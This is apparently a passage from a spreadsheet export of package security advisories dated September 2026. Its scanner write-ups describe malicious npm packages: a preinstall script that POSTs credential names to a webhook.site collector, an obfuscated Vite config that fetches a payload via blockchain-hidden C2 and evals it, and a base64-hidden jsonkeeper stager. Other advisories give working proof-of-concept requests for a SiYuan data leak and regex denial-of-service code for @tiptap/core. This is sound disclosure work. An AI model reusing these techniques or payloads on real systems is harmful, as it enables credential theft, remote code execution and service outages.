## Source: ghsa-malware (37d8dfb4ceaec110414441ebad5da37dad342ef653a20499504385d9db1ffdac)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59" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16045</t></is></c></row><row r="1660"><c r="A1660" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1660" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1660" s="5" t="inlineStr"><is><t>GHSA-3j7p-44mj-76hx</t></is></c><c r="D1660" s="5" t="inlineStr" /><c r="E1660" s="5" t="inlineStr" /><c r="F1660" s="5" t="inlineStr" /><c r="G1660" s="5" t="inlineStr" /><c r="H1660" s="5" t="inlineStr" /><c r="I1660" s="5" t="inlineStr" /><c r="J1660" s="5" t="inlineStr" /><c r="K1660" s="5" t="inlineStr" /><c r="L1660" s="5" t="inlineStr"><is><t>npm:krdpass-auth-react-native</t></is></c><c r="M1660" s="5" t="inlineStr" /><c r="N1660" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1660" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1660" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1660" s="5" t="inlineStr" /><c r="R1660" s="5" t="inlineStr" /><c r="S1660" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3a74ab9e45d4f67b40e21dc7491aff1979b4bf79be24bc49b8588916c18b847f)
package.json declares a preinstall script (preinstall.js) that runs automatically on `npm install`. The script collects os.hostname(), os.userInfo(), homedir, internal IP addresses, CI/repository identifiers (GITHUB_REPOSITORY, CI_PROJECT_PATH, JENKINS_URL, etc.), parent package.json metadata, and enumerates process.env keys matching /(TOKEN|KEY|SECRET|PASS|AUTH|CRED|AWS|AZURE|GCP|NPM|GITHUB|GITLAB|API)/i, then POSTs the payload to a hardcoded anonymous collector at https://webhook.site/5ba4d4a7-b977-4bb8-b26e-517b46271316. Bulk env-name enumeration and internal-network / CI-identifier collection are outside any documented purpose of a React Native auth library and disclose to a remote party which credentials exist on the installer or CI runner and how the host is situated. The manifest additionally lists the package's own name (krdpass-auth-react-native ^1.6.0) as one of its dependencies, causing npm to resolve and execute the lifecycle hooks of future self-published versions during install.

## Source: ghsa-malware (802615c8d05ade7426df3338956dc9f1e50c4bfdbb4890b873a978859fa2a537)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0" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16042</t></is></c></row><row r="1661"><c r="A1661" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1661" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1661" s="5" t="inlineStr"><is><t>GHSA-4qhr-qf46-fcrx</t></is></c><c r="D1661" s="5" t="inlineStr" /><c r="E1661" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1661" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1661" s="5" t="inlineStr" /><c r="H1661" s="5" t="inlineStr" /><c r="I1661" s="5" t="inlineStr" /><c r="J1661" s="5" t="inlineStr" /><c r="K1661" s="5" t="inlineStr" /><c r="L1661" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M1661" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N1661" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1661" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1661" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1661" s="5" t="inlineStr" /><c r="R1661" s="5" t="inlineStr" /><c r="S1661" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-63gh-g2x5-x69v. This link is maintained to preserve external references.

### Original Description
Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T1661" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx</t></is></c></row><row r="1662"><c r="A1662" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1662" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1662" s="5" t="inlineStr"><is><t>GHSA-57v5-wqx3-cgj4</t></is></c><c r="D1662" s="5" t="inlineStr" /><c r="E1662" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1662" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1662" s="5" t="inlineStr" /><c r="H1662" s="5" t="inlineStr" /><c r="I1662" s="5" t="inlineStr" /><c r="J1662" s="5" t="inlineStr" /><c r="K1662" s="5" t="inlineStr" /><c r="L1662" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M1662" s="5" t="inlineStr"><is><t>0.0.0-20260726004013-64c26e74bb82</t></is></c><c r="N1662" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1662" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1662" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1662" s="5" t="inlineStr" /><c r="R1662" s="5" t="inlineStr" /><c r="S1662" s="5" t="inlineStr"><is><t>### Scope note (please read first)

This endpoint does not exist in v3.7.3 or on master. It was introduced on the development branch by commit `acfc02ee8` ("Improve database field visibility across views", #11020) and is live on `v3.7.4-alpha.1`, so it will ship in v3.7.4 unless gated first. No released stable version is affected.

### Summary

`/api/av/getAttributeViewFieldViews` is registered with `CheckAuth` only and applies no publish-access filtering. Given a database `avID`, it returns the complete view structure of that database: every view's name, icon, layout type and the per-field `Hidden` flag, regardless of whether the caller is authorized to see that database or those views.

The route registered immediately before it, `getAttributeViewKeys`, does gate reader roles.

### Details

| Item | Detail |
|---|---|
| Route | `kernel/api/router.go:530` `POST /api/av/getAttributeViewFieldViews` → `model.CheckAuth` → `getAttributeViewFieldViews` |
| Middleware | `CheckAuth` only, no `CheckReadonly`, no `CheckAdminRole` |
| Guard in handler | None. Greps for `IsReadOnlyRoleContext`, `publishAccess` and `Filter*` all return zero matches |
| Exposed | For each entry in `attrView.Views`: `ID`, `Icon`, `Name`, `Type`, and the `Hidden` flag for the requested field |
| Introduced by | `acfc02ee8` (feature), dev branch only |

**The leak path.** The handler binds `avID` and `keyID`, validating them against the ID pattern only, then calls `GetAttributeViewFieldViews(avID, keyID)`. That function calls `av.ParseAttributeView(avID)`, which reads the database's storage file directly by identifier. There is no ownership check and no publish-access check anywhere on the path. The result is a per-view record for every view the database defines.

What a reader learns is author-written: view names are typed by the user, and layout type distinguishes a table from a gallery or kanban. The `Hidden` flag additionally reveals, per view, which fields the author chose to conceal.

**Guarded sibling, one route earlier.** `getAttributeViewKeys` (`kernel/api/router.go:529`) is also reader-reachable and does gate:

```go
if model.IsReadOnlyRoleContext(c) {
    blockAttributeViewKeys = model.FilterBlockAttributeViewKeysByPublishAccess(c, publishAccess, ...)
}
```

The new route at 530 applies nothing equivalent.

This is worth flagging as more than an isolated omission. `acfc02ee8` added a new reader-reachable attribute-view endpoint during the same development cycle in which the surrounding attribute-view endpoints were being hardened. The same pattern produced an earlier exposure: `f2d966659`, which added encrypted-notebook unlock status for plugin consumption, created a reader-reachable disclosure on a surface that was otherwise being tightened. A check on new reader-reachable routes against the gating applied to their registered neighbours would catch this class before release.

**Reachability, stated honestly.** The endpoint requires a valid `avID` and `keyID`. `renderAttributeView` supplies both to a reader for any database embedded in a document the reader can access. The realistic target is therefore a partially-published database: the document publishes one view, and this endpoint enumerates the existence, name, layout type and hidden-field configuration of the database's other views, including views the author did not publish. Against a database with no reader-accessible surface at all, obtaining the identifiers is harder, particularly since the `getAttributeViewKeysByID` enumeration path was closed on the development branch. The severity below reflects that constraint rather than a worst case.

### Proof of Concept

Precondition: `v3.7.4-alpha.1` build, publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. A database embedded in a reader-accessible document, with at least one additional view that is not published.

Step 1, obtain the identifiers through the reader-accessible path:

```
POST http://127.0.0.1:6808/api/av/renderAttributeView
{"id":"&lt;block id of the embedded database in a published doc&gt;"}

→ 200, returns the published view together with its key identifiers
```

Step 2, enumerate the rest of the database's views:

```
POST http://127.0.0.1:6808/api/av/getAttributeViewFieldViews
{"avID":"&lt;avID from step 1&gt;","keyID":"&lt;keyID from step 1&gt;"}

→ 200, returns a record per view: ID, Icon, Name, Type, Hidden
```

The response includes views that were never published, disclosing their author-written names, their layout types, and which field is hidden in each.

### Impact

An anonymous reader in publish mode, or any publish `RoleReader`, can enumerate the full view structure of a database when only part of that database is published. View names are author-written free text and frequently describe the data they filter, so this discloses the existence and subject matter of unpublished views. The per-field `Hidden` flags additionally reveal the author's concealment choices across those views. Confidentiality only, with no integrity or availability impact, and bounded by the reader needing identifiers obtainable from a reader-accessible database.

### Suggested fix

Gate the handler for read-only roles, mirroring `getAttributeViewKeys`: when `IsReadOnlyRoleContext(c)` holds, resolve the block that owns the `avID` and apply the publish-access check before returning any view record, or filter the returned set through the same `FilterBlockAttributeViewKeysByPublishAccess` path its neighbour uses.</t></is></c><c r="T1662" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-57v5-wqx3-cgj4</t></is></c></row><row r="1663"><c r="A1663" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1663" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1663" s="5" t="inlineStr"><is><t>GHSA-8rcc-9ggm-659p</t></is></c><c r="D1663" s="5" t="inlineStr" /><c r="E1663" s="5" t="inlineStr" /><c r="F1663" s="5" t="inlineStr" /><c r="G1663" s="5" t="inlineStr" /><c r="H1663" s="5" t="inlineStr" /><c r="I1663" s="5" t="inlineStr" /><c r="J1663" s="5" t="inlineStr" /><c r="K1663" s="5" t="inlineStr" /><c r="L1663" s="5" t="inlineStr"><is><t>npm:@usemosaik/template-react-js</t></is></c><c r="M1663" s="5" t="inlineStr" /><c r="N1663" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1663" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1663" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1663" s="5" t="inlineStr" /><c r="R1663" s="5" t="inlineStr" /><c r="S1663" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3174ac7cecbc1869ae5ac87ea585de744f6b7d17b8c089b746384c2b7e2355a3)
This template package ships files/vite.config.js which, after a benign Vite header, appends ~26KB of heavily obfuscated code (obfuscator.io-style string-array with rotation dispatcher, hex payloads XOR-decoded at runtime with key 0xA2, arithmetic-hidden numeric literals). When the scaffolded project is run via `vite` / `npm run dev`, the config executes a `run()` routine that queries Ethereum JSON-RPC endpoints (`eth_getBlockByNumber`, `eth_getTransactionCount`) against a hardcoded sender address to resolve a command-and-control IP hidden in on-chain transaction data, fetches an XOR-encrypted payload over HTTP, decrypts it, and passes it to both `eval(...)` and `spawn('node', ['-e', payload], {detached: true, stdio: 'ignore', windowsHide: true})`, yielding a hidden detached Node process on the developer's machine. The package's declared `main` (dist/index.js) is inert, so scanners inspecting only the entry point miss the payload; the obfuscation and EtherHiding indirection exist solely to conceal the remote-execution chain from static review. Execution fires the first time a developer runs the scaffolded project generated from this template, giving full RCE on the developer's host.

## Source: ghsa-malware (9cb614be24802762692ee3d58173981e3c20bdebe4fabd6846ab71671568d4ca)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3" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16047</t></is></c></row><row r="1664"><c r="A1664" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1664" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1664" s="5" t="inlineStr"><is><t>GHSA-9cfw-xh4g-cc2f</t></is></c><c r="D1664" s="5" t="inlineStr" /><c r="E1664" s="5" t="inlineStr" /><c r="F1664" s="5" t="inlineStr" /><c r="G1664" s="5" t="inlineStr" /><c r="H1664" s="5" t="inlineStr" /><c r="I1664" s="5" t="inlineStr" /><c r="J1664" s="5" t="inlineStr" /><c r="K1664" s="5" t="inlineStr" /><c r="L1664" s="5" t="inlineStr"><is><t>npm:i18nexus-tools</t></is></c><c r="M1664" s="5" t="inlineStr" /><c r="N1664" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1664" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1664" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1664" s="5" t="inlineStr" /><c r="R1664" s="5" t="inlineStr" /><c r="S1664" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (558344f06c374c5eff9c870250d63a5e9f784ffe23f91182154d9c66c441ee0b)
The package was found to contain malicious code or consuming dependency that contains malicious code

## Source: ghsa-malware (4708373dfb7211317f4ebae7bd11027043840e6db7a9f2d9aa3385611a2fdad8)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4" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16046</t></is></c></row><row r="1665"><c r="A1665" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1665" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1665" s="5" t="inlineStr"><is><t>GHSA-f4f2-cqqp-jcrx</t></is></c><c r="D1665" s="5" t="inlineStr" /><c r="E1665" s="5" t="inlineStr" /><c r="F1665" s="5" t="inlineStr" /><c r="G1665" s="5" t="inlineStr" /><c r="H1665" s="5" t="inlineStr" /><c r="I1665" s="5" t="inlineStr" /><c r="J1665" s="5" t="inlineStr" /><c r="K1665" s="5" t="inlineStr" /><c r="L1665" s="5" t="inlineStr"><is><t>npm:@web2apk/baileys</t></is></c><c r="M1665" s="5" t="inlineStr" /><c r="N1665" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1665" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1665" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1665" s="5" t="inlineStr" /><c r="R1665" s="5" t="inlineStr" /><c r="S1665" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (1ad4c3329ebb2fdeb3b9ddc93abcb5f3dab6773f7a7999ff96d063d49edc04d9)
The package was found to contain malicious code or consuming dependency that contains malicious code

## Source: ghsa-malware (23d279de5770039164036b3717fa8188b73601e773d8647f1a4e1b6ac59c5a17)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5" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16043</t></is></c></row><row r="1666"><c r="A1666" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1666" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1666" s="5" t="inlineStr"><is><t>GHSA-j95f-988m-3j2f</t></is></c><c r="D1666" s="5" t="inlineStr" /><c r="E1666" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1666" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1666" s="5" t="inlineStr" /><c r="H1666" s="5" t="inlineStr" /><c r="I1666" s="5" t="inlineStr" /><c r="J1666" s="5" t="inlineStr" /><c r="K1666" s="5" t="inlineStr" /><c r="L1666" s="5" t="inlineStr"><is><t>npm:@tiptap/core</t></is></c><c r="M1666" s="5" t="inlineStr"><is><t>3.30.5</t></is></c><c r="N1666" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1666" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1666" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1666" s="5" t="inlineStr" /><c r="R1666" s="5" t="inlineStr" /><c r="S1666" s="5" t="inlineStr"><is><t>## Summary

`@tiptap/core` contains two quadratic regular-expression denial-of-service paths in its default Markdown attribute parsers. Pandoc-style block attributes use two unanchored greedy expressions that rescan repeated `__QUOTED_0` prefixes. Inline shortcode attributes use another unanchored greedy key expression that rescans a long word-character run when no equals sign follows.

The public `createAtomBlockMarkdownSpec` and `createBlockMarkdownSpec` helpers call the vulnerable Pandoc-style parser; `createInlineMarkdownSpec` calls the separately vulnerable shortcode parser. Using unmodified npm 3.29.2, a complete 20,508-byte atom-block token took approximately 1.40 seconds while an equal-length control took 0.29 ms. A complete 32,776-byte inline token took approximately 2.21 seconds while its equal-length control took 0.19 ms. Current repository `main` commit `5158212970344952dd9918b6a44bfb400d7fb6c1` retains both expressions.

## Block attribute root cause

`packages/core/src/utilities/markdown/attributeUtils.ts` uses both `matchAll` and `replace` with `/([a-zA-Z][\w-]*)\s*=\s*(__QUOTED_\d+__)/g`. The candidate is `'__QUOTED_0'.repeat(n) + '__QUOTED_0__'`. There are no quotes, so the preceding replacement leaves it unchanged. At each `Q`, the greedy key-name expression consumes the remaining word-character run, the required equals sign fails, and the unanchored engine restarts at the next `Q`. This yields `O(n^2)` work, and the cleanup pass repeats it.

A complete public-API proof is:

```js
import { createAtomBlockMarkdownSpec } from '@tiptap/core'
const tokenizer = createAtomBlockMarkdownSpec({ nodeName: 'probe' }).markdownTokenizer
const attack = '__QUOTED_0'.repeat(2048) + '__QUOTED_0__'
const source = `:::probe {${attack}} :::\n`
const started = performance.now()
tokenizer.tokenize(source, [], {})
console.log(performance.now() - started)
```

Measured complete-tokenizer timings were 6.23, 23.12, 88.93, 369.10, and 1,400.17 ms at 1,308, 2,588, 5,148, 10,268, and 20,508 bytes. Equal-length controls took 0.07 to 0.29 ms. The directly exported parser took 5,645.71 ms at 40,972 bytes while its control took 0.64 ms.

## Inline attribute root cause

`packages/core/src/utilities/markdown/createInlineMarkdownSpec.ts` uses `/(\w+)=(?:"([^"]*)"|'([^']*)')/g`. For a long word-character run without an equals sign, `\w+` consumes the remaining suffix, `=` fails, and the unanchored engine restarts at the next character. The default inline tokenizer extracts this attacker string directly from a syntactically complete `[shortcode attributes]` token.

```js
import { createInlineMarkdownSpec } from '@tiptap/core'
const tokenizer = createInlineMarkdownSpec({ nodeName: 'probe', selfClosing: true }).markdownTokenizer
const source = `[probe ${'0'.repeat(32768)}]`
const started = performance.now()
tokenizer.tokenize(source, [], {})
console.log(performance.now() - started)
```

At 1,032, 2,056, 4,104, 8,200, 16,392, and 32,776 bytes, candidates took 3.24, 12.88, 54.82, 136.91, 557.83, and 2,209.47 ms. Equal-length hyphen controls took 0.02 to 0.19 ms.

## Impact

Applications parsing attacker-controlled Markdown with these helpers can have a browser main thread, server event loop, or worker blocked by a small input. Persisted documents can repeatedly freeze clients; repeated requests can exhaust server-side parsing capacity. Editors that only consume validated ProseMirror JSON and never invoke the Markdown parsing path are not directly affected through document content.

## History and remediation

Commit `35645d94ae9cd73448a564104c2e08f64e9564bc` introduced both parsers on 14 October 2025, first released in 3.7.0. Versions 3.7.0 through current 3.29.2 and current `main` remain affected. Official issue, PR, and repository-advisory searches found no duplicate.

Require a start-of-string or whitespace boundary before both key-value parsers, and preferably replace the multi-pass placeholder and shortcode regex designs with deterministic single-pass tokenizers. Keep quoted values out-of-band so attacker input cannot collide with predictable `__QUOTED_n__` placeholders. Add complete block and inline Markdown-tokenizer scaling regressions with equal-length controls.

Please credit GitHub user `joostgrunwald` as finder/reporter.</t></is></c><c r="T1666" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f</t></is></c></row><row r="1667"><c r="A1667" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1667" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1667" s="5" t="inlineStr"><is><t>GHSA-mqvm-gmc4-6rv2</t></is></c><c r="D1667" s="5" t="inlineStr" /><c r="E1667" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1667" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1667" s="5" t="inlineStr" /><c r="H1667" s="5" t="inlineStr" /><c r="I1667" s="5" t="inlineStr" /><c r="J1667" s="5" t="inlineStr" /><c r="K1667" s="5" t="inlineStr" /><c r="L1667" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M1667" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N1667" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1667" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1667" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1667" s="5" t="inlineStr" /><c r="R1667" s="5" t="inlineStr" /><c r="S1667" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-527h-q9f6-p7qx. This link is maintained to preserve external references.

### Original Description
Heap-based buffer overflow in .NET and Visual Studio allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T1667" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2</t></is></c></row><row r="1668"><c r="A1668" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1668" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1668" s="5" t="inlineStr"><is><t>GHSA-q72m-f2r4-w4cw</t></is></c><c r="D1668" s="5" t="inlineStr" /><c r="E1668" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1668" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1668" s="5" t="inlineStr" /><c r="H1668" s="5" t="inlineStr" /><c r="I1668" s="5" t="inlineStr" /><c r="J1668" s="5" t="inlineStr" /><c r="K1668" s="5" t="inlineStr" /><c r="L1668" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M1668" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N1668" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1668" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1668" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1668" s="5" t="inlineStr" /><c r="R1668" s="5" t="inlineStr" /><c r="S1668" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-2j8r-3c22-8565. This link is maintained to preserve external references.

### Original Description
Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T1668" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw</t></is></c></row><row r="1669"><c r="A1669" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1669" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1669" s="5" t="inlineStr"><is><t>GHSA-rgj7-g3m4-5g8c</t></is></c><c r="D1669" s="5" t="inlineStr" /><c r="E1669" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1669" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1669" s="5" t="inlineStr" /><c r="H1669" s="5" t="inlineStr" /><c r="I1669" s="5" t="inlineStr" /><c r="J1669" s="5" t="inlineStr" /><c r="K1669" s="5" t="inlineStr" /><c r="L1669" s="5" t="inlineStr"><is><t>npm:sharp</t></is></c><c r="M1669" s="5" t="inlineStr"><is><t>0.35.4</t></is></c><c r="N1669" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1669" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1669" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1669" s="5" t="inlineStr" /><c r="R1669" s="5" t="inlineStr" /><c r="S1669" s="5" t="inlineStr"><is><t>### Impact
A number of vulnerabilities, two rated as "Critical" severity using CVSSv3, have been discovered and fixed in the upstream libheif dependency. These can lead to possible remote code execution (RCE) on glibc-based Linux when run under certain conditions.

The attack vector for these claims to be "network" however sharp does not provide any networking features so this vulnerability is down-rated to a "High" severity using CVSSv4 but please note its Subsequent System Impact.

Those processing untrusted input with versions of sharp prior to 0.35.4 are affected.

### Patches

#### Using prebuilt binaries provided by sharp?

Most people rely on the prebuilt binaries provided by sharp.

Please upgrade sharp to the latest version, currently 0.35.4, which provides libheif 1.23.2.

#### Using a globally-installed libheif?

Please ensure you are using the latest libheif 1.23.2.

### Workarounds
Add the following to your code to prevent sharp from decoding AVIF images.
```js
sharp.block({ operation: ["VipsForeignLoadHeif"] });
```

Ensure you are using a `node` executable binary compiled as a Position Independent Executable (PIE). Most Linux package managers already do this for protection against RCE however be warned that the "official" Node.js binaries do not.

### References
- [CVE-2026-84383](https://github.com/strukturag/libheif/security/advisories/GHSA-g89c-p67h-r497)
- https://github.com/strukturag/libheif/security/advisories/GHSA-2jg2-4ch7-h545</t></is></c><c r="T1669" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c</t></is></c></row><row r="1670"><c r="A1670" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1670" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1670" s="5" t="inlineStr"><is><t>GHSA-v3f6-m9j2-437p</t></is></c><c r="D1670" s="5" t="inlineStr" /><c r="E1670" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1670" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1670" s="5" t="inlineStr" /><c r="H1670" s="5" t="inlineStr" /><c r="I1670" s="5" t="inlineStr" /><c r="J1670" s="5" t="inlineStr" /><c r="K1670" s="5" t="inlineStr" /><c r="L1670" s="5" t="inlineStr"><is><t>NuGet:Microsoft.AspNetCore.Server.IISIntegration</t></is></c><c r="M1670" s="5" t="inlineStr"><is><t>10.0.12, 11.0.0-rc.1, 8.0.31, 9.0.20</t></is></c><c r="N1670" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1670" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1670" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1670" s="5" t="inlineStr" /><c r="R1670" s="5" t="inlineStr" /><c r="S1670" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-8cp2-47hg-mfgh. This link is maintained to preserve external references.

### Original Description
Improper handling of highly compressed data (data amplification) in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1670" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-v3f6-m9j2-437p</t></is></c></row><row r="1671"><c r="A1671" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1671" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1671" s="5" t="inlineStr"><is><t>MAL-2026-16048</t></is></c><c r="D1671" s="5" t="inlineStr" /><c r="E1671" s="5" t="inlineStr" /><c r="F1671" s="5" t="inlineStr" /><c r="G1671" s="5" t="inlineStr" /><c r="H1671" s="5" t="inlineStr" /><c r="I1671" s="5" t="inlineStr" /><c r="J1671" s="5" t="inlineStr" /><c r="K1671" s="5" t="inlineStr" /><c r="L1671" s="5" t="inlineStr"><is><t>npm:punypump</t></is></c><c r="M1671" s="5" t="inlineStr" /><c r="N1671" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1671" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1671" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1671" s="5" t="inlineStr" /><c r="R1671" s="5" t="inlineStr" /><c r="S1671" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6e56cc14096d20f679823bf15af9f44dff039e01f23d2082eba8020200d04a7f)
The package presents itself as a console shim (index.js is a verbatim copy of console-browserify with description 'Emulate console for all the browsers'), but also ships library.js and test/sessionCtrl.js which auto-execute a stager on module load via initializeService().catch(...). The stager fetches an opaque blob from a base64-hidden URL (config.API_GATEWAY = 'aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9WNk5CWA==' decoding to https://www.jsonkeeper.com/b/V6NBX), AES-256-CBC decrypts it with a hardcoded key, and passes the plaintext to eval(). The endpoint URL, HTTP header name, and header value are all base64-encoded in config.js. Content served from the jsonkeeper.com paste is mutable and attacker-controlled, so require('punypump/library') runs arbitrary attacker code on the installer's machine.
</t></is></c><c r="T1671" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16048</t></is></c></row><row r="1672"><c r="A1672" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1672" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1672" s="5" t="inlineStr"><is><t>MAL-2026-16049</t></is></c><c r="D1672" s="5" t="inlineStr" /><c r="E1672" s="5" t="inlineStr" /><c r="F1672" s="5" t="inlineStr" /><c r="G1672" s="5" t="inlineStr" /><c r="H1672" s="5" t="inlineStr" /><c r="I1672" s="5" t="inlineStr" /><c r="J1672" s="5" t="inlineStr" /><c r="K1672" s="5" t="inlineStr" /><c r="L1672" s="5" t="inlineStr"><is><t>npm:tailwindcss-aspectratio-styles</t></is></c><c r="M1672" s="5" t="inlineStr" /><c r="N1672" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1672" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1672" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1672" s="5" t="inlineStr" /><c r="R1672" s="5" t="inlineStr" /><c r="S1672" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9b995eb02f80f9037beda9f8a864f55109e054925175289df0c1b29ed8011bc3)
